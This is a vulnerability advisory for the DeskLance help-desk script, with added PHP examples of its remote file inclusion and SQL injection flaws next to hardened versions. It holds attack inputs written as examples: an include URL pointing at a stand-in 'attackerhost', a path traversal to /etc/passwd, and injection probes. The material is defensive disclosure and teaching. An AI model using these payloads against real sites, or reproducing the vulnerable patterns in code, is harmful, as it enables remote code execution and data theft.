DeskLance Vuln.

Vuln. discovered by: r0t
Date: 24 Nov. 2005
Original advisory: http://pridels.blogspot.com/2005/11/desklance-vuln.html
Vendor: http://www.desklance.com/
Affected version: 2.3 and prior
Vuln. description: Input passed to the "main" parameter in "index.php" is not properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources. Remote inclusion requires allow_url_fopen to be enabled on the server (on by default in PHP 4 and 5.1; from PHP 5.2 the separate allow_url_include setting, off by default, governs it); inclusion of files already present on the host works regardless of that setting. Example: /support/index.php?main=http://attackerhost/file
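The include pattern described above, beside one way to harden it. This is an added example written for this page, not DeskLance code: the advisory does not show the vendor's include statement, and the page names, the pages/ directory and the `resolve_page` helper are assumptions.

```php
<?php
// Added example, not DeskLance source. The general pattern behind the
// advisory: a request parameter reaches include() unvalidated. With
// allow_url_fopen / allow_url_include enabled, ?main=http://attackerhost/file
// fetches and executes remote PHP; without it, ?main=../../../../etc/passwd
// still reads local files.
function vulnerable_include(array $get): void
{
    $main = $get['main'];
    include $main; // attacker controls the entire path
}

// Hardened form: the parameter selects a key in a fixed allowlist and never
// becomes part of a path. Unknown or missing keys fall back to a default.
// The page names below are assumed for illustration.
const PAGES = [
    'home'    => 'pages/home.php',
    'faq'     => 'pages/faq.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(?string $main): string
{
    if ($main === null || !array_key_exists($main, PAGES)) {
        return PAGES['home'];
    }
    return PAGES[$main];
}

function safe_include(array $get): void
{
    // __DIR__ pins the include to the application tree; the value of
    // "main" only ever chooses between the allowlisted files.
    include __DIR__ . '/' . resolve_page($get['main'] ?? null);
}

// Constructed probes showing where each value ends up (no file is included):
foreach (['faq', 'http://attackerhost/file', '../../../../etc/passwd', null] as $probe) {
    printf("%-32s -> %s\n", var_export($probe, true), resolve_page($probe));
}
```

The allowlist keys are the only thing an attacker can choose; both the remote URL and the traversal string map to the default page rather than to a path. Checking for "http://" or stripping "../" from the value is not a substitute, since wrappers such as ftp:// or php:// and encoded traversal sequences bypass such filters.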
Also, the "announce" parameter is not properly sanitised before being used in a SQL query. A malformed value triggers a database error whose message discloses the full installation path on the server, and the parameter can be exploited to inject arbitrary SQL code.
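The "announce" issue, as an added example that is not DeskLance code: an in-memory SQLite table stands in for the application's database, and the table name, columns and the two lookup functions are assumptions made for illustration.

```php
<?php
// Added example, not DeskLance source. An in-memory SQLite table with two
// constructed rows stands in for the application's announcements table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE announcements (id INTEGER PRIMARY KEY, subject TEXT, body TEXT)');
$db->exec("INSERT INTO announcements VALUES (1, 'Welcome', 'Public notice')");
$db->exec("INSERT INTO announcements VALUES (2, 'Staff only', 'Internal notice')");

// The pattern the advisory describes: the request value is pasted into the
// SQL text. ?announce=1' breaks the statement; on a host with display_errors
// on, the resulting PHP warning or uncaught exception is printed with
// "in /absolute/path/to/script.php on line N", which is the full path
// disclosure. ?announce=0 OR 1=1 returns every row instead of one.
function vulnerable_lookup(PDO $db, string $announce): array
{
    $sql = 'SELECT id, subject FROM announcements WHERE id = ' . $announce;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: validate the type, bind the value as a parameter, and keep
// database errors out of the HTTP response.
function safe_lookup(PDO $db, string $announce): array
{
    $id = filter_var($announce, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject rather than coerce a non-integer value
    }
    try {
        $stmt = $db->prepare('SELECT id, subject FROM announcements WHERE id = :id');
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        error_log('announcement lookup failed: ' . $e->getMessage()); // server log only
        return [];
    }
}

// Constructed probes: a normal id, a boolean injection, and a syntax breaker.
foreach (['1', '0 OR 1=1', "1'"] as $probe) {
    try {
        $rows = vulnerable_lookup($db, $probe);
        echo "vulnerable [$probe]: " . count($rows) . " row(s)\n";
    } catch (PDOException $e) {
        echo "vulnerable [$probe]: error reaches the client: " . $e->getMessage() . "\n";
    }
    echo "safe       [$probe]: " . count(safe_lookup($db, $probe)) . " row(s)\n";
}
```

Run with the PHP CLI: the vulnerable function returns one row for "1", both rows for "0 OR 1=1" and throws for "1'", while the hardened function returns one row for "1" and nothing for the other two. Keeping display_errors off in production closes the path disclosure even where a query still fails; binding the parameter closes the injection.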
Solution: Edit the source code to ensure that input is properly sanitised: restrict "main" to a fixed list of local page names instead of using its value as a path, and pass "announce" to the database as a typed, bound parameter rather than concatenating it into the query. Disabling display_errors on the server prevents the path disclosure from error messages.